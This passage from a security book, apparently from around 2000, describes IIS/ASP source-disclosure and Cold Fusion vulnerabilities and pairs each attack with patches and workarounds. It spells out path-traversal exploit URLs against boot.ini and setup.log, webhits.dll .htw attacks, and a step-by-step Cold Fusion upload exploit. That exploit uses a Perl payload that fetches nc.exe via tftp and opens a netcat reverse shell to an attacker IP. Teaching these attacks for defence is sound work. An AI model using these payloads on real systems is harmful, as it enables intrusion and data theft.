Popularity: 8 Simplicity: 9
Impact: 5
Risk Rating: 7
Active Server Pages (ASP) is Microsoft’s answer to the scripting world of Perl and CGI on UNIX. Usually written in VBScript, the code can perform much of what’s needed to maintain state, provide back-end database access, and generally display HTML in the browser. One of the nice features about ASP is their ability to output an HTML file on the fly. One of the less-than-nice features is their numerous vulnerabilities that allow attack- ers to view the ASP code itself. Why is this bad? First, attackers can learn further vulnera- bilities in program logic, and second, attackers can view sensitive information kept in ASP files, like database usernames and passwords.
] ASP Dot Bug Vulnerability
Weld of the L0pht group discovered the ASP dot bug in 1997. The vulnerability involved being able to reveal ASP source code to attackers. By appending one or more dots to the end of an ASP URL under IIS 3.0, it was possible to view the ASP source code, thereby re- vealing its program logic and, more importantly, sensitive information such as usernames and passwords for database authentication. The exploit worked by adding a dot to the end of the URL:
http://192.168.51.101/code/example.asp.
For more information about this vulnerability, check out http://oliver.efri.hr/~crv/
security/bugs/NT/asp.html.
U ASP Dot Bug Countermeasure
The good news is that Microsoft provided a fix to the dot vulnerability—a hotfix patch for IIS 3.0. You can find the patch at ftp://ftp.microsoft.com/bussys/IIS/iis-public/
fixes/usa/security/fesrc-fix/.
The bad news is the patch introduced another vulnerability. By replacing the period in the filename “example.asp” with the hexadecimal representation of it (0x2e), attackers can once again download the source code to the ASP file. For example, attackers would run the following to further exploit the vulnerability:
http://192.168.51.101/code/example%2easp
] ASP Alternate Data Streams Vulnerability
Originally posted to Bugtraq by Paul Ashton, the vulnerability was a natural follow-up to the ASP dot, but it allowed attackers to download the ASP source to your web pages. The exploit was easy and quite popular with the script kiddies. Simply use the following URL format when discovering an ASP page:
http://192.168.51.101/scripts/file.asp::$DATA
If the exploit works, your Netscape browser will then prompt you for a location to save the file. Internet Explorer, by default, will display the source in the browser window.
Save it and view the source in your favorite text editor. For more information regarding this vulnerability, you can check out http://www.rootshell.com.
U ASP Alternate Data Stream Countermeasure
The fix for IIS 3.0 can be found at ftp://ftp.microsoft.com/bussys/IIS/iis-public/
fixes/usa/security/iis3-datafix/, and the fix for IIS 4.0 can be found at ftp://ftp.microsoft .com/bussys/IIS/iis-public/fixes/usa/security/iis4-datafix/.
The work-around is to limit the file access rights of all source code by removing the read access of the Everyone group. In the end, execute permissions are only needed for your source code.
] Showcode.asp and codebrws.asp Vulnerability
The last file viewing vulnerability we’ll discuss affects IIS 4.0 and again allows attackers to download ASP source code. The difference with this vulnerability is that it wasn’t a bug per se, but more an example of poor programming. When you choose to install sam- ple ASP code during a default installation of IIS 4.0, a number of poorly programmed sample files allow attackers to download another file’s source. The problem lies in the script’s inability to restrict the use of “..” in the file’s path. For example, the following showcode.asp exploit will display the boot.ini file on affected systems (with liberal access controls, any file can be viewed with this exploit):
http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../..
/../../../boot.ini
As with the showcode.asp vulnerability, with the codebrws.asp file you can view any file on the local drive. As we discuss in Chapter 13, “Remote Control Insecurities,” we can find the CIF files of pcAnywhere users:
http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source=
/../../../../../winnt/repair/setup.log
With both the showcode.asp and codebrws.asp vulnerabilities, it is impossible to correctly down- load binary files from the target system. This is due to typical translation being performed by the ASP script. The translation of characters in a file like SAM._ will corrupt it and make it unusable;
however, it may not stop a skilled hacker from reconstructing the structure of the SAM file and using the information retrieved.
U Showcode.asp et al. Countermeasure
The fix to the previously mentioned problems is to install a hotfix to IIS. The patch and the relevant Knowledge Base article (Q232449) can be found at ftp://ftp.microsoft.com/
bussys/IIS/iis-public/fixes/usa/Viewcode-fix/.
] Webhits.dll Vulnerability
A series of file-viewing vulnerabilities comes from Cerberus Information Security team and encompasses an ISAPI application: webhits.dll. The DLL provides hit-highlighting functionality for MS Index Server. However, an attack is possible, allowing an attacker to view sensitive ASP source code (or anything else on the drive). The first .HTW attack works by using an existing .HTW file to view source:
http://192.168.51.101/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=
/../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full
The second .HTW attack works by submitting the name of a file that does not exist on the system. Using an existing file as the base, and over 230 spaces (%20) between the real file (default.asp) and the .HTW extension, the web services inetinfo will forgo the exten- sion (.HTW) and serve up any file on the system for the attacker:
http://192.168.51.101/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=/../../../../../te st.txt&CiRestriction=none&CiHiliteType=Full
The third .HTW attack works by using the null.htw filename to deliver raw files to the browser:
http://192.168.51.101/null.htw?CiWebHitsFile=/../../../../../winnt/
repair/setup.log&CiRestriction=none&CiHiliteType=Full
The preceding URL syntax will force the IIS web server to cough up the /winnt/
repair/setup.log file on the system:
U Webhits.dll Countermeasure
The work-around for the webhits.dll vulnerability is to remove the application map- ping for .HTW extensions. To do this, select the master properties of the vulnerable server and select Edit for the “WWW Service.” Now click the Home Directory tab, and click the Configuration button within the Application Settings group. You should see the following screen:
Simply click on the .HTW application mapping and click the Remove button. Once you remove the application mapping of .HTW to \winnt\system32\webhits.dll, the web server will no longer call webhits.dll and therefore eliminate the vulnerability:
] Cold Fusion Vulnerabilities
Popularity: 9 Simplicity: 9
Impact: 8
Risk Rating: 9
The L0pht discovered a number of significant vulnerabilities in the Allaire product Cold Fusion Application Server, allowing remote command execution on a vulnerable web server. When installed, the product places example code and online documentation.
The problem lies in a number of these sample code files, as they do not limit their interac- tion to localhost only.
The first problem lies in the default installed openfile.cfm file, allowing attackers to upload any file to the web server. Openfile.cfm performs the uploading of the local file to the target web server, but the displayopenedfile.cfm actually displays the file in your browser. And then exprcalc.cfm evaluates the uploaded file and deletes it (or is supposed to). Using openfile.cfm alone, you can trick the system into not deleting a file uploaded and then subsequently run any command on the local system. To exploit this vulnerabil- ity, follow these steps:
1. Craft a file that when run on the remote web server, will run a local command.
For example, we prefer Perl scripts when available and so will create a file called “test.pl” and in it will put our favorite lines.
system("tftp –i 192.168.51.100 GET nc.exe");
system("nc –e cmd.exe 192.168.51.100 3000");
This will work assuming there is a Perl interpreter present on the Cold Fusion Application Server.
2. Point your browser to the following URL:
http://192.168.51.101/cfdocs/expeval/openfile.cfm 3. Insert your handcrafted file in the Open File field and click OK:
You should see something like the following:
4. In the URL, replace the D:\INETPUB\WWWROOT\cfdocs\expeval\test.pl with the name and location of the file that deletes the uploaded files:
exprcalc.cfm. After you make the changes, the URL should read
http://192.168.51.101/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=
2000&OpenFilePath=D:\INETPUB\WWWROOT\cfdocs\expeval\exprcalc.cfm 5. You should receive the contents of exprcalc.cfm in the window, and it should
be deleted from the system. Now all files uploaded with openfile.cfm will remain on the remote system.
6. Reload test.pl onto the remote system with the same steps outlined earlier.
Once complete, your file (test.pl) will be uploaded and awaiting your call.
7. Run the test.pl file by calling it with a URL:
http://192.168.51.101/cfdocs/expeval/test.pl
8. If you had your TFTP server and yournetcatlistener running ahead of time, you should see the following “Administrator” prompt:
C:\>nc -l -p 3000
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
D:\INETPUB\WWWROOT\cfdocs>
U Cold Fusion Countermeasures
There are two ways to prevent exploitation of Cold Fusion’s vulnerabilities:
▼ Remove the affected scripts.
▲ Apply the Allaire patch for the exprcalc.cfm vulnerability. It can be found at http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full.